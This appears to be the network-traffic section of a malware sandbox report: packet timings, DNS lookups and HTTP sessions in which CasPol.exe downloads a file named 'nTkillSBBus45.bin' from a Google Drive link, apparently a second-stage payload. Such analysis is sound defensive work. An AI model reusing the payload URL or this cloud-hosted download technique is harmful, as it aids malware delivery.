                                      Mar 20, 2023 11:23:11.686677933 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:11.728390932 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.091964960 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.092227936 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.092228889 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.092359066 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.092581987 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.092612028 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.092665911 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.092758894 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.092834949 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.092834949 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.093034983 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.093281984 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.093947887 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.094284058 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.094346046 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.094567060 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.096529007 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.096740007 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.096829891 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.097059965 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.098711967 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.099062920 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.100601912 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.100784063 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.100878954 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.101051092 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.101166964 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.101330996 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.101402998 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.101568937 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.101603031 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.101632118 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.101773977 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.101773977 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.101876020 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.102026939 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.102076054 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.102236986 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.102243900 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.102284908 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.102389097 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.102389097 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.102442026 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.102590084 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.102626085 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.102776051 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.103457928 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.103616953 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.103741884 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.103909969 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.103996038 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.104151964 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.104202986 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.104234934 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.104352951 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.104353905 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.104458094 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.104679108 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.105206013 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.105421066 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.105510950 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.105673075 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.105716944 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.105911016 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.106113911 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.106276989 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.106364965 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.106518984 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.106559038 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.106761932 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.106846094 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.107026100 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.107042074 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.107074976 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.107207060 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.107254982 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.107448101 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.107840061 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.108011961 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.108093023 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.108246088 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.108285904 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.108439922 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.109756947 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.109924078 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.109966993 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.110121965 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.110167980 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.110291004 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.110326052 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.110368013 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.110446930 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.110601902 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.110673904 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.110879898 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.110927105 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.110969067 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.111100912 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.111102104 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.111190081 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.111337900 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.111342907 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.111383915 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.111517906 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.111546993 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.111701965 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.111741066 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.111872911 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.111943007 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.111987114 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.112025023 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.112133980 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.112149954 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.112171888 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.112279892 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.112279892 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.112468958 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.112622976 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.112670898 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.112819910 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.112858057 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.113009930 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.113046885 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.113243103 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.113296986 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.113318920 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.113449097 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.113449097 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.113500118 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.113647938 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.113692045 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.113883018 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.113899946 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.113944054 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.114032984 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.114094973 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.114129066 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.114276886 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.114308119 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.114456892 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.114496946 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.114648104 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.114677906 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.114700079 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.114826918 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.114826918 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.114875078 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.115025043 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.115087032 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.115251064 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.115289927 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.115441084 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.115485907 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.115644932 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.115658998 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.115716934 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.115807056 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.115894079 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.115952015 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.116105080 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.116153955 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.116302013 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.116355896 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.116530895 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.116545916 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.116583109 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.116681099 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.116730928 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.116751909 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.116904974 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.116942883 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.117096901 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.117144108 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.117294073 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.117322922 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.117471933 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.117503881 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.117661953 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.117706060 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.117876053 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.117907047 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.118030071 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.118057966 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.118093014 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.118208885 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.118208885 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.118305922 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.118453026 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.118480921 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.118624926 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.118658066 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.118850946 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.118882895 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.118905067 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.119029999 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.119029999 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.119075060 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.119226933 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.119337082 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.119497061 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.119528055 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.119679928 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.119720936 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.119832993 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.119873047 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.120018959 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.120048046 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.120206118 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.120234966 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.120378017 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.120415926 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.120578051 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.120580912 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.120615959 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.120743990 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.120743990 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.120803118 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.120955944 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.120995998 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.121170998 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.121201992 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.121359110 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.121398926 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.121552944 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.121584892 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.121607065 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.121736050 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.121809006 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.121840954 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.121989012 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.122011900 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.122131109 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.122158051 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.122183084 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.122320890 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.122320890 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.122380018 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.122509003 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.122530937 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.122570038 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.122659922 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.122711897 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.122736931 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.122761965 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.122873068 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.122873068 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.122916937 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.123064995 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.123099089 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.123256922 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.123256922 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.123302937 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.123481989 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.123516083 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.123665094 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.123691082 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.123816013 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.123833895 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.123862028 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.123974085 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.123974085 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.124022007 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.124166012 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.124200106 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.124351978 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.124351978 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.124394894 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.124546051 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.124546051 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.124581099 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.124633074 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:12.124691010 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:12.124742985 CET49817443192.168.11.20142.250.186.33
                                      TimestampSource PortDest PortSource IPDest IP
                                      Mar 20, 2023 11:23:11.131897926 CET5365853192.168.11.201.1.1.1
                                      Mar 20, 2023 11:23:11.141695023 CET53536581.1.1.1192.168.11.20
                                      Mar 20, 2023 11:23:11.612874031 CET6238253192.168.11.201.1.1.1
                                      Mar 20, 2023 11:23:11.639658928 CET53623821.1.1.1192.168.11.20
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Mar 20, 2023 11:23:11.131897926 CET192.168.11.201.1.1.10x8c78Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                      Mar 20, 2023 11:23:11.612874031 CET192.168.11.201.1.1.10x5dc4Standard query (0)doc-0s-98-docs.googleusercontent.comA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Mar 20, 2023 11:23:11.141695023 CET1.1.1.1192.168.11.200x8c78No error (0)drive.google.com172.217.16.206A (IP address)IN (0x0001)false
                                      Mar 20, 2023 11:23:11.639658928 CET1.1.1.1192.168.11.200x5dc4No error (0)doc-0s-98-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                      Mar 20, 2023 11:23:11.639658928 CET1.1.1.1192.168.11.200x5dc4No error (0)googlehosted.l.googleusercontent.com142.250.186.33A (IP address)IN (0x0001)false
                                      • drive.google.com
                                      • doc-0s-98-docs.googleusercontent.com
                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.11.2049816172.217.16.206443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                      TimestampkBytes transferredDirectionData
                                      2023-03-20 10:23:11 UTC0OUTGET /uc?export=download&id=1Ll5Auv3nDnZ4O0Qt2f2ZcFUknFi4BgKW HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                      Host: drive.google.com
                                      Cache-Control: no-cache
                                      2023-03-20 10:23:11 UTC0INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Mon, 20 Mar 2023 10:23:11 GMT
                                      Location: https://doc-0s-98-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/npt87m3l1utm86tkghdjh82fk6qcfges/1679307750000/00651307112604445902/*/1Ll5Auv3nDnZ4O0Qt2f2ZcFUknFi4BgKW?e=download&uuid=ea605c4e-1574-48ab-a781-ae85f09da2da
                                      Strict-Transport-Security: max-age=31536000
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy: script-src 'nonce-cwfKrOQ6-KlNuZ41mnpoug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Cross-Origin-Opener-Policy: same-origin
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.11.2049817142.250.186.33443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                      TimestampkBytes transferredDirectionData
                                      2023-03-20 10:23:11 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/npt87m3l1utm86tkghdjh82fk6qcfges/1679307750000/00651307112604445902/*/1Ll5Auv3nDnZ4O0Qt2f2ZcFUknFi4BgKW?e=download&uuid=ea605c4e-1574-48ab-a781-ae85f09da2da HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                      Cache-Control: no-cache
                                      Host: doc-0s-98-docs.googleusercontent.com
                                      Connection: Keep-Alive
                                      2023-03-20 10:23:12 UTC1INHTTP/1.1 200 OK
                                      X-GUploader-UploadID: ADPycdtwnHJhBtvsnYdlaW805yXkEbiYeX8TrB3DV9r4tpN8VRvAWvPLe7KAVkaPlVzF4_qvszndqCqpetqh9k82-SBkkE4aFjjx
                                      Content-Type: application/octet-stream
                                      Content-Disposition: attachment; filename="nTkillSBBus45.bin"; filename*=UTF-8''nTkillSBBus45.bin
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Credentials: false
                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, 